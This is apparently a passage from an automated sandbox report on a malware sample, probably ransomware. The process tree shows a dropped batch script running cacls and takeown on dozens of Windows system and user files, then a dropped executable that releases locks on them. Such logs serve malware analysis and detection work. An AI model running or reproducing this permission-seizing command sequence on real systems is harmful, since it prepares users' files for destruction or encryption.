  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:5196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:5256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:5272
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:5284
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""
  2⤵
  PID:5320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"
    3⤵
    - Modifies file permissions
    PID:5380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:5396
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "Identity-H" -nobanner
      4⤵
      Executes dropped EXE
      PID:5408
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:5440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5516
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5528
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:5560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5636
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5648
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:5680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:5756
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:5768
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:5800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:5876
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:5888
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:5920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    - Modifies file permissions
    PID:5980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:5996
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:6008
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""
  2⤵
  PID:6040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C
    3⤵
    PID:6084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"
    3⤵
    - Modifies file permissions
    PID:6100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "utc.app.json" -nobanner
    3⤵
    PID:6120
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "utc.app.json" -nobanner
      4⤵
      PID:6132
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:5136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    PID:288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:4004
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:5244
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:5288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:5392
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:5420
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:5360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:5504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:5524
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:5552
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""
  2⤵
  PID:5472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C
    3⤵
    PID:5660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"
    3⤵
    - Modifies file permissions
    PID:5676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "vedatamodel.jfm" -nobanner
    3⤵
    PID:5584
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "vedatamodel.jfm" -nobanner
      4⤵
      PID:5564
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:5728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Modifies file permissions
    PID:5716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:5696
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:5856
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:5896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:5820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    PID:4368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:2456
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:4716
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""
  2⤵
  PID:5988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C
    3⤵
    PID:5960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"
    3⤵
    - Modifies file permissions
    PID:5936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "osver.txt" -nobanner
    3⤵
    PID:6052
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "osver.txt" -nobanner
      4⤵
      PID:6088
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""
  2⤵
  PID:6128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"
    3⤵
    - Modifies file permissions
    PID:3016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "edbres00002.jrs" -nobanner
    3⤵
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "edbres00002.jrs" -nobanner
      4⤵
      PID:5268
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""
  2⤵
  PID:5188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C
    3⤵
    PID:5228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"
    3⤵
    - Modifies file permissions
    PID:5404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "parse.dat" -nobanner
    3⤵
    PID:5428
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "parse.dat" -nobanner
      4⤵
      PID:5220
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""
  2⤵
  PID:5276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "SmsInterceptStore.jfm" -nobanner
    3⤵
    PID:5452
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "SmsInterceptStore.jfm" -nobanner
      4⤵
      PID:5328
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""
  2⤵
  PID:5672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"
    3⤵
    - Modifies file permissions
    PID:5616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
    3⤵
    PID:5704
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
      4⤵
      PID:5684
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:5892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Modifies file permissions
    PID:5816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:4756
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:5836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:5948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    - Modifies file permissions
    PID:6104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:5124
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:5944
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:5140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:6060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:6124
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:4504
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:5384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    PID:5164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5520
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:5496
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:5644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:5700
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:5712
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:5692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:5992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:5824
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:5780
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""
  2⤵
  PID:5828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C
    3⤵
    PID:6136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"
    3⤵
    - Modifies file permissions
    PID:4944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "utc.tracing.json" -nobanner
    3⤵
    PID:5940
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "utc.tracing.json" -nobanner
      4⤵
      PID:5908
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""
  2⤵
  PID:5416
- - C:\Windows\SysWOW64\cacls.exe
